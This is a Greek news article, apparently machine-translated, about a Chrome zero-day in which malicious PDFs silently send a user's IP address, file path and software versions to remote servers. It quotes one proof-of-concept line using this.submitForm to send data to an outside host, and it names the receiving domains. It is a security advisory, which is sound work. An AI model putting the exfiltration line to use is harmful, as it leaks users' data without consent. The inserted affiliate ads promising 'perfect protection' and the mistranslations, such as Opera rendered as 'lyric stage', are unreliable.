Το σφάλμα Chrome επιτρέπει στους εισβολείς να συλλέγουν δεδομένα χρήστη μέσω αρχείων PDF

Η υπηρεσία ανίχνευσης εκμετάλλευσης EdgeSpot ανακάλυψε μια ενδιαφέρουσα Χρώμιο ευπάθεια μηδενικής ημέρας που εκμεταλλεύεται έγγραφα PDF.

Η ευπάθεια επιτρέπει στους επιτιθέμενους συγκομιδή ευαίσθητων δεδομένων χρησιμοποιώντας κακόβουλα έγγραφα PDF που έχουν ανοίξει στο Chrome.

Μόλις το θύμα ανοίξει τα αντίστοιχα αρχεία PDF στο Google Chrome, ένα κακόβουλο πρόγραμμα αρχίζει να λειτουργεί στο παρασκήνιο συλλέγοντας δεδομένα χρήστη.

Τα δεδομένα στη συνέχεια προωθούνται στον απομακρυσμένο διακομιστή που ελέγχεται από τους εισβολείς. Ίσως αναρωτιέστε ποια δεδομένα απορροφούνται από τους εισβολείς, στοχεύουν τα ακόλουθα δεδομένα στον υπολογιστή σας:

• διεύθυνση IP
• Πλήρης διαδρομή του αρχείου PDF στο σύστημα
• Εκδόσεις OS και Chrome

Προσοχή σε αρχεία PDF με κακόβουλο λογισμικό

Εμπειρογνώμονες έχων στίγματα ότι ένας από τους δύο τομείς readnotify [.] com ή burpcollaborator [.] καθαρό έλαβε τα δεδομένα.

Αποκάλυψαν ότι οι επιτιθέμενοι χρησιμοποιούν το this.submitForm () PDF Javascript API για τη συλλογή των ευαίσθητων πληροφοριών των χρηστών.

Το δοκιμάσαμε με ένα ελάχιστο PoC, μια απλή κλήση API όπως this.submitForm (" http://google.com/test’) θα κάνει το Google Chrome να στείλει τα προσωπικά δεδομένα στο google.com.

Αυτό το σφάλμα Chrome εκμεταλλεύτηκε δύο διαφορετικά σύνολα κακόβουλων αρχείων PDF, τα οποία κυκλοφόρησαν και τα δύο τον Οκτώβριο του 2017 και τον Σεπτέμβριο του 2018, αντίστοιχα.

Συγκεκριμένα, τα δεδομένα που συλλέγονται μπορούν να χρησιμοποιηθούν από τους εισβολείς για να βελτιώσουν τις επιθέσεις στο μέλλον. Οι αναφορές δείχνουν ότι η πρώτη δέσμη αρχείων συντάχθηκε χρησιμοποιώντας την υπηρεσία παρακολούθησης PDF του ReadNotify.

Οι χρήστες μπορούν να χρησιμοποιήσουν την υπηρεσία για να παρακολουθούν τις απόψεις των χρηστών. Το EdgeSpot δεν έχει κοινοποιήσει λεπτομέρειες σχετικά με τη φύση του δεύτερου συνόλου αρχείων PDF.

Γρήγορη συμβουλή: Αλλάξτε το πρόγραμμα περιήγησής σας σε Opera

Σε αυτούς τους ταραγμένους καιρούς, μας επιτίθενται με κακόβουλο λογισμικό, ηλεκτρονικό ψάρεμα και trojans σε κάθε βήμα, οπότε πρέπει να είμαστε πολύ πιο προσεκτικοί και να παραμένουμε προστατευμένοι.

Και δεδομένου ότι αυτό είναι ένα συγκεκριμένο πρόβλημα για το Chrome, μπορείτε να αποφύγετε αυτήν την απειλή και όλους τους άλλους με ένα πρόγραμμα περιήγησης με ασφάλεια ΛΥΡΙΚΗ ΣΚΗΝΗ.

Αυτό το πρόγραμμα περιήγησης διαθέτει ένα ενσωματωμένο πρόγραμμα αποκλεισμού διαφημίσεων που όχι μόνο καθαρίζει τέτοιες περισπασμούς αλλά και αποκλείει σενάρια ανάλυσης, εικονοστοιχεία παρακολούθησης και μέθοδοι για τη συλλογή των δεδομένων σας.

Και αν θέλετε να είστε απολύτως σίγουροι ότι αποφεύγετε κάθε κίνδυνο, παραμείνετε πίσω από το ενσωματωμένο VPN υπηρεσία που είναι 100% δωρεάν για απεριόριστο χρόνο.

ΛΥΡΙΚΗ ΣΚΗΝΗ

Το Opera προσφέρει την τέλεια προστασία από απειλές με το ενσωματωμένο πρόγραμμα αποκλεισμού διαφημίσεων και VPN δωρεάν!

Αποκτήστε το δωρεάν
Επισκέψου την ιστοσελίδα

Πώς μπορώ να παραμείνω προστατευμένος από ευπάθειες PDF;

Λήψη του Adobe Acrobat PRO

Το Adobe και το Chrome ταιριάζουν με τον χειρισμό αρχείων PDF. Εγκαθιστώντας την επέκταση Adobe για το Chrome, μπορείτε να ελέγξετε και να χειριστείτε τα PDF σύμφωνα με τις προτιμήσεις σας χωρίς να αφήσετε το αγαπημένο σας πρόγραμμα περιήγησης.

Παρά την ισχυρή δομή του, κακόβουλο λογισμικό που κρύβεται σε αρχεία PDF ενδέχεται να μην εντοπιστεί εάν χρησιμοποιείτε την τυπική έκδοση του Αναγνώστη.

Η επαγγελματική έκδοση συνιστάται για να εγγυηθεί την προστασία σας και να κρατήσετε τα δεδομένα σας μακριά από χάκερ.

Αν και δεν είναι δωρεάν, η τιμή που θα πληρώσετε είναι μάλλον μικρή για την πληθώρα πρόσθετων δυνατοτήτων που θα απολαύσετε, συμπεριλαμβανομένης της βελτιωμένης ασφάλειας των αρχείων PDF.

Περιλαμβάνεται επίσης μια δωρεάν δοκιμή 7 ημερών, ώστε να μπορείτε να δοκιμάσετε την πλήρη εμπειρία Pro πριν κάνετε την αγορά.

Adobe Acrobat PRO

Αποφύγετε το κακόβουλο λογισμικό κατεβάζοντας το Adobe Acrobat PRO. Έχει πολλά περισσότερα χαρακτηριστικά από τη δωρεάν έκδοση και διατηρεί τα δεδομένα σας ασφαλή.

Δωρεάν δοκιμή
Επισκέψου την ιστοσελίδα

---

Σε περίπτωση που θέλετε να είστε ασφαλείς κατά την περιήγηση στο Διαδίκτυο, θα χρειαστεί να αποκτήσετε ένα πλήρες ειδικό εργαλείο για να ασφαλίσετε το δίκτυό σας. Εγκαταστήστε τώρα την Ιδιωτική πρόσβαση στο Διαδίκτυο και ασφαλίστε τον εαυτό σας. Προστατεύει τον υπολογιστή σας από επιθέσεις κατά την περιήγηση, αποκρύπτει τη διεύθυνση IP σας και αποκλείει κάθε ανεπιθύμητη πρόσβαση.

---

Η υπηρεσία ανίχνευσης Exploit EdgeSpot ήθελε να ειδοποιήσει τους χρήστες του Chrome για τους πιθανούς κινδύνους, επειδή η ενημέρωση κώδικα δεν αναμενόταν να κυκλοφορήσει στο εγγύς μέλλον.

Η EdgeSpot ανέφερε στην Google σχετικά με την ευπάθεια πέρυσι και η εταιρεία υποσχέθηκε να κυκλοφορήσει μια ενημέρωση στα τέλη Απριλίου.

Ωστόσο, μπορείτε να εξετάσετε το ενδεχόμενο να χρησιμοποιήσετε μια προσωρινή λύση του προβλήματος προβάλλοντας τοπικά τα ληφθέντα έγγραφα PDF χρησιμοποιώντας μια άλλη εφαρμογή ανάγνωσης.

Εναλλακτικά, μπορείτε επίσης να ανοίξετε τα έγγραφα PDF στο Chrome αποσυνδέοντας τα συστήματά σας από το Διαδίκτυο.